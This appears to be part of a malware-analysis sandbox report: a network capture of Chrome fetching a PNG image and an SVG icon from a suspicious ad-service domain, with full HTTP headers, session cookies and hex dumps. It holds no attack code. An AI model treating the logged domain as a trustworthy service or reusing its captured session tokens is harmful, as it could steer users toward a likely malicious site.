                                                                                                                                      Data Ascii: "WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m4aW/b))3o~j
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7 ad 10 54 37 b9 4e 64 7c 02 3a 1e 3d 86 77 59 3c be d3 96 ae ba 94 cb 88 5e 97 68 8b b3 2f c1 13 5f
                                                                                                                                      Data Ascii: FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gvT7Nd|:=wY<^h/_


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      60192.168.2.1649782104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:52 UTC1568OUTGET /stJHdx5abCDRUWhdXjmVIv3zo2ry8Mmnl7DqPy6KQiYHAxqLL9JOrSrQVeGnjcq8gh252 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:52 UTC669INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:52 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 70712
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="stJHdx5abCDRUWhdXjmVIv3zo2ry8Mmnl7DqPy6KQiYHAxqLL9JOrSrQVeGnjcq8gh252"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fYTJ%2FxgWhLhPsz%2Fj6qXE%2F84gjoVPRLmLcb39YZbGq6ULtHkFr1GYyKAU%2B%2FObG62yUzJY6gpqbveRvYX7H1TvOFOv0OKkQg1o63npNA3iRlKyvxq7JrWYtOndMC%2BhRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6ba2dd62c582-SEA
                                                                                                                                      2024-05-08 18:12:52 UTC700INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                                                                      Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      61192.168.2.1649783104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:52 UTC1154OUTGET /klD379FF2GM6zPm33HgL5klVO4I4SQpHwx80Z7Yl1r1coRtBxGS3beU878163 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:52 UTC660INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:52 GMT
                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="klD379FF2GM6zPm33HgL5klVO4I4SQpHwx80Z7Yl1r1coRtBxGS3beU878163"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ufIUuTonI8ilOvble9imZxViHjewGGVrGba%2FKYMIIYc4R6lkXrgM22R7IXzAi97aHM8L8mvCxglPoPQkP96dmPeSsQlgZChTGyzND9msz13GZWWdF6ypYXWAQorOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6ba31b6d7696-SEA
                                                                                                                                      2024-05-08 18:12:52 UTC709INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                                                                                                      Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 39 37 36 32 20 30 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39
                                                                                                                                      Data Ascii: 9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e 36 39 35 32
                                                                                                                                      Data Ascii: 33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.6952
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 34 4c 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 4c 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 5a 4d 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35
                                                                                                                                      Data Ascii: 4L28.1744 44.8939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9034L17.481 48.2941L17.4826 48.295L19.6031 44.9034ZM19.6009 44.902L21.723 41.5113L21.7129 41.505
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 37 34 30 38 20 34 31 2e 36 34 33 20 34 37 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33 31 32 32 20 32 31 2e 30 33 37 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 5a 4d 33 39 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 33 39 2e 33 31 32 35 20 32 30 2e 39 37 38 20 33 39 2e 33 31 32 34 20 32 31 2e 30 31 34 39 20 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 34 37 2e 33 31
                                                                                                                                      Data Ascii: 7408 41.643 47.3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3122 21.037L39.3124 21.096ZM39.3125 20.9412C39.3125 20.978 39.3124 21.0149 39.3123 21.0519L47.31
